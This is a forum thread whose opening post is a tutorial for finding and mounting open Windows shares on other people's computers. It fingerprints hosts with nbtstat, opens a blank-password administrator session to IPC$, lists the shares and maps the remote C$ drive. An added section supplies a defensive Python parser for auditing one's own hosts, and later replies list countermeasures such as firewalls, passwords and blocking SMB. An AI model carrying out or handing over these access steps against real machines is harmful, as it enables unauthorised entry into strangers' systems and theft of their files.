Thread: Searching for open Windows Shares with NetBIOS

  1. #1
    ssym3tryy's Avatar

    Zeropaid Noob

    Join Date
    May 2008
    Posts
    37

    Searching for open Windows Shares with NetBIOS

    Searching for open Windows Shares with NetBIOS - a tutorial by sym3try

    This is an older exploit, but it still works on many computers.

    STEP 1

    From the command prompt, type this command:

    c:\>nbtstat -A <ip_address>

    You will get one of two possible responses:

    1. Host Not Found. This means that either the host is down or is blocking your requests. You will have to try another host ip address.

    2. You will get an output that resembles this:

    C:\>nbtstat -A 192.168.2.10

    Wireless Network Connection:
    Node IpAddress: [192.168.2.10] Scope Id: []

    NetBIOS Remote Machine Name Table

    Name Type Status
    ---------------------------------------------
    FRANK-A1EA4AC4D<00> UNIQUE Registered
    FRANK-A1EA4AC4D<20> UNIQUE Registered
    WORKGROUP <00> GROUP Registered
    WORKGROUP <1E> GROUP Registered
    WORKGROUP <1D> UNIQUE Registered
    ..__MSBROWSE__.<01> GROUP Registered

    MAC Address = 00-0D-0B-BD-4C-94

    ***What you are looking for in this output is for one of the NetBIOS entries to contain a Type of "<20>" which indicates that File Sharing is enabled.***

    STEP 2

    Initiate a NULL Session with the host.

    C:\>net use \\<ip_address>\IPC$ "" /user:administrator

    This command attempts to connect to the remote Windows share using the default username of "administrator" with a blank password.

    This command will either return a reply of "The Command Completed Successfully" or it will return an error, which would indicate that a unique password is set. (cracking these types of passwords is beyond the scope of this specific tutorial, but hey, feel free to write one and post it :D )

    STEP 3

    Obtain a list of the host's network shares.

    C:\>net view \\<ip_address>

    This will list all available network shares.

    STEP 4

    Connect to the share.

    C:\>net use * \\<ip_address>\<share_name>$

    Example: net use * \\192.168.2.10\c$

    Once this operation completes, open up "My Computer" and the network share should now be available, listed as one of your drives.

    Enjoy!

    SYM3TRY

    Hack the Planet
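
Added example (not part of the original post): for an administrator auditing machines they manage, this parses saved `nbtstat -A` output like the listing in Step 1 and reports whether the host advertises the `<20>` name, meaning the Server service (file sharing) is running. The suffix meanings are the standard NetBIOS values; the function names and the embedded sample are this example's own.

```python
import re

# Standard NetBIOS name suffixes (hex) and the service each one advertises.
SUFFIX_SERVICE = {
    ("00", "UNIQUE"): "Workstation service (computer name)",
    ("00", "GROUP"): "Workgroup/domain membership",
    ("01", "GROUP"): "Master browser (__MSBROWSE__)",
    ("1D", "UNIQUE"): "Master browser for the workgroup",
    ("1E", "GROUP"): "Browser service elections",
    ("20", "UNIQUE"): "Server service (file and printer sharing)",
}
# One table row: name (padding optional), <hex suffix>, UNIQUE|GROUP, status.
ROW = re.compile(
    r"^\s*(?P<name>\S.*?)\s*<(?P<suffix>[0-9A-Fa-f]{2})>\s+"
    r"(?P<type>UNIQUE|GROUP)\s+(?P<status>\w+)\s*$")

def parse_name_table(text):
    """Return one dict per NetBIOS name-table row found in nbtstat output."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            row = m.groupdict()
            row["suffix"] = row["suffix"].upper()
            row["service"] = SUFFIX_SERVICE.get((row["suffix"], row["type"]), "unknown")
            rows.append(row)
    return rows

def audit(text):
    """Return (answered, file_sharing_advertised, rows) for one host's output."""
    rows = parse_name_table(text)  # empty for "Host not found." or a blocked query
    sharing = any(r["suffix"] == "20" and r["status"] == "Registered" for r in rows)
    return bool(rows), sharing, rows

# Constructed sample: the output shown in the post above.
SAMPLE = r"""
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
FRANK-A1EA4AC4D<00> UNIQUE Registered
FRANK-A1EA4AC4D<20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
WORKGROUP <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-0D-0B-BD-4C-94
"""

if __name__ == "__main__":
    print(audit(SAMPLE)[:2])
```

A host that reports `(True, True)` here is one to review against the counter-measures in the next post: whether it needs to share anything at all, and whether SMB is reachable from outside the LAN.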

  2. #2
    w31n3r's Avatar

    Stop 0x0000007B

    Join Date
    Sep 2007
    Location
    Huh?
    Posts
    1,345

    and if you do get hacked by some script kiddies, pack up your PC and take up gardening...it'll go a long way in improving your carbon footprint too.

    the following is only for the noobs out there:

    Counter-measures


    1. get and use a decent NAT router. end of story.
    2. if you don't use a router with a hardware firewall, make sure windows is fully updated and you have a software firewall at least.
    3. use a password, possibly at least 8 characters long with a combination of alpha-numeric and special characters.
    4. USE YOUR COMMON SENSE!
    5. don't share your folders. if you must, don't share your c: drive or whatever drive your windows system files are on. refer to #4 above.
    6. if you need to share folders across a LAN, set up your router firewall to deny all remote server message block (SMB) requests. avoid using windows default simple file sharing. google on how to configure and set user permissions.

  3. #3
    Boomer The Dog's Avatar

    Anthropomorphic

    Join Date
    Jun 2005
    Location
    Pittsburgh PA
    Posts
    539

    I think that sym3try is looking for shares-resources on the local network, but this would apply to other computers on the WAN (internet) too. His example is if you popped on the local router or wi-fi access point and you wanted to see what was on there, though your local cafe will probably have client separation on, so that neighboring computers can't communicate with each other.

    I notice that some Macs don't seem to use NetBIOS names, nothing will come up with nbtstat, even when you know the Mac is on the network, unless I'm doing something wrong. Local shares should also show up in My Network Places where you can view network computers.

    w31n3r, agreed, when I help people get their net going, I always push them to get a router with a firewall on it the first thing. Most people want wireless so they're going to get a router anyway, but no matter what I try to make sure they use a router.

    If you have Verizon DSL, the modem they give you has a router in it, but the firewall is off by default. They have low-medium-high settings on the firewall that you can turn on, so you don't have to get another router with that ISP.

    One thing I'm not big on is DDOS (denial of service) protection in some of the new firewalls, if you're running torrents, because it can block some of the connections. I haven't seriously experimented with it, but I've seen logs of repeated blocked connections on the port that the torrent client is using.
